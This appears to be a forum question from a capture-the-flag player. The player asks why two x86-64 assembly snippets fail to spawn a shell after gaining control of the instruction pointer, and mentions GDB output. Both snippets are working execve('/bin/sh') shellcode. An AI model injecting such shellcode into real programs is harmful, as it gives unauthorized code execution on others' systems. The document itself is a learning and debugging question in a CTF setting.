I usually use a different method to push /bin/sh in rdi to get a shell , but I wanted to try this one : Put in case that i can control the RIP and there are no limitation or filters.So I can execute the assembly code as I want.
mov rax, 0x0068732f6e69622f
push rax
push rsp
pop rdi
mov rax ,0x3b
xor rsi, rsi
xor rdx, rdx
syscall
lea rdi, [rip + shell]
mov rax, 0x3b
xor rsi, rsi
xor rdx, rdx
syscall
shell:
.string "/bin/sh"
While I usually use the above one , I don't get why the first one isn't working. I also used GDB to verify and everything seems to be good and in the right positions.In addition to that i also get in dgb : process 8870 is executing new program: /usr/bin/dash.
Why it doesn't work?
So that's what I tried to do , but i don't get why it doesn't work.Actually in the current CTF neither of them works even if as I said in gdb everything seems right